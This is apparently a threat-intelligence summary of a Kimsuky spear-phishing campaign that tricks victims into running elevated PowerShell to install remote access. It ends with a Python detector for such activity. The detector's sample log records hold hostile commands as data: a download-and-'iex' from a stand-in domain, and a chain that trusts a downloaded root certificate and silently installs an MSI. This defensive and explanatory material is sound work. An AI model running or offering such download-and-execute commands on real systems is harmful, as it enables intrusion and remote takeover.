Full Report
North Korean state actor 'Kimsuky' (aka 'Emerald Sleet' or 'Velvet Chollima') has been observed using a new tactic inspired by the now widespread ClickFix campaigns. [...]
Analysis Summary
# Threat Actor: DPRK Hackers (Likely Kimsuky)
## Attribution & Identity
The threat actors are linked to the Democratic People's Republic of Korea (DPRK). Microsoft associates this specific tactic (spear-phishing leading to PowerShell execution) with the threat group **Kimsuky**. The operators are observed masquerading as South Korean government officials to build trust with targets.
## Activity Summary
The actors utilize spear-phishing emails containing a PDF attachment. If the victim attempts to read the document, they are redirected to a fake device registration link. This link then instructs the victim to execute attacker-provided PowerShell commands with administrator privileges. This process ultimately installs a browser-based remote desktop tool and registers the victim's device with a remote server, enabling the attacker to gain direct access for data exfiltration. Limited-scope attacks using this tactic were observed starting in January 2025.
## Tactics, Techniques & Procedures
- **Social Engineering/Spear-phishing:** Sending targeted emails with PDF attachments.
- **Deceptive User Prompts:** Directing victims to run malicious code via fake device registration steps.
- **Command Execution:** Tricking victims into manually executing attacker-provided PowerShell scripts using administrator rights.
- **Initial Access/Execution:** Execution leads to the installation of a browser-based remote desktop tool.
- **Persistence/Control:** Registering the victim’s device with a remote server to achieve direct command and control or access.
- **Data Exfiltration:** The ultimate goal enabled by granting remote access.
- **TTP Note:** The article notes this tactic aligns with "ClickFix" methodologies, often associated with nation-state actors like Kimsuky.
## Targeting
- **Sectors:** International affairs organizations, NGOs, government agencies, and media companies.
- **Geography:** North America, South America, Europe, and East Asia.
- **Victims:** Individuals working within the targeted sectors of the mentioned regions.
## Tools & Infrastructure
- **Malware families used:** Browser-based remote desktop tool (specific name not detailed).
- **Infrastructure:** A remote server used for device registration.
- **Hardcoded PIN:** Used during the certificate download phase for device registration.
## Implications
This represents a 'new approach' by DPRK-linked actors targeting traditional espionage victims. Relying on the victim to execute administrative PowerShell commands after social engineering (a living-off-the-land technique combined with user coercion) is effective because no exploit or malicious attachment has to get past network or email defenses for initial execution; the only prerequisite is a convincing pretext.
## Mitigations
- Treat all unsolicited communications, especially those containing attachments or directing to external link verification processes, with extreme caution.
- Users must be warned never to copy and paste code (especially scripts/PowerShell) found online into an administrative terminal session unless the source and action are fully verified and trusted.
- Harden endpoints against unauthorized remote access tool installation and suspicious PowerShell executions, particularly when executed by standard users elevated to administrator context.
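As an added illustration of the last mitigation (not from the article or any vendor tooling), the following Python sketch applies the detection idea to constructed PowerShell script block log records (Event ID 4104): a single pasted block that both fetches content from a remote server and then executes, installs or trusts it is flagged, while an ordinary download or admin one-liner is not. The cmdlet patterns, sample records and `example.invalid` domains are assumptions, not indicators from the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Indicator categories for the tactic described above: an attacker-supplied command
# pasted into an elevated PowerShell session that fetches content from a remote
# server and then runs it, imports a certificate, or installs a tool.
PATTERNS: Dict[str, re.Pattern] = {
    "download": re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Download(String|File)|\bcurl\b|\bwget\b", re.I),
    "execute": re.compile(r"Invoke-Expression|\biex\b|Start-Process|msiexec", re.I),
    "evasion": re.compile(r"-ExecutionPolicy\s+Bypass|-WindowStyle\s+Hidden|-EncodedCommand", re.I),
    "register": re.compile(r"Import-Certificate|certutil.*-addstore|-Verb\s+RunAs", re.I),
}

# Constructed Event ID 4104 (script block logging) records; none of this is real telemetry.
SAMPLE_EVENTS = [
    {"RecordId": 1, "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running' | Sort-Object DisplayName"},
    {"RecordId": 2, "ScriptBlockText": "Invoke-WebRequest -Uri 'https://updates.example.invalid/notes.txt' -OutFile C:\\Temp\\notes.txt"},
    {"RecordId": 3, "ScriptBlockText": "$r = Invoke-WebRequest -UseBasicParsing 'https://device-reg.example.invalid/verify'; iex $r.Content"},
    {"RecordId": 4, "ScriptBlockText": "Invoke-WebRequest -Uri 'https://device-reg.example.invalid/device.cer' -OutFile $env:TEMP\\device.cer; "
                                        "Import-Certificate -FilePath $env:TEMP\\device.cer -CertStoreLocation Cert:\\LocalMachine\\Root; "
                                        "Start-Process msiexec.exe -ArgumentList '/i remote.msi /qn' -Verb RunAs"},
]

@dataclass
class Finding:
    record_id: int
    categories: List[str]
    suspicious: bool

def categorise(script_block: str) -> List[str]:
    """Return the indicator categories present in one logged script block."""
    return [name for name, rx in PATTERNS.items() if rx.search(script_block)]

def is_clickfix_like(categories: List[str]) -> bool:
    """Fetching remote content is benign on its own; fetching it and then running,
    installing or trusting it within the same pasted block is the tell."""
    cats = set(categories)
    return "download" in cats and bool(cats & {"execute", "register"})

def scan(events) -> List[Finding]:
    findings = []
    for e in events:
        cats = categorise(e["ScriptBlockText"])
        findings.append(Finding(e["RecordId"], cats, is_clickfix_like(cats)))
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"record {f.record_id}: {'SUSPICIOUS' if f.suspicious else 'ok'} {f.categories}")
```

In production the records would come from the Microsoft-Windows-PowerShell/Operational log, and a hit should be correlated with the launching process (Run dialog or console started by an interactive user) rather than acted on alone.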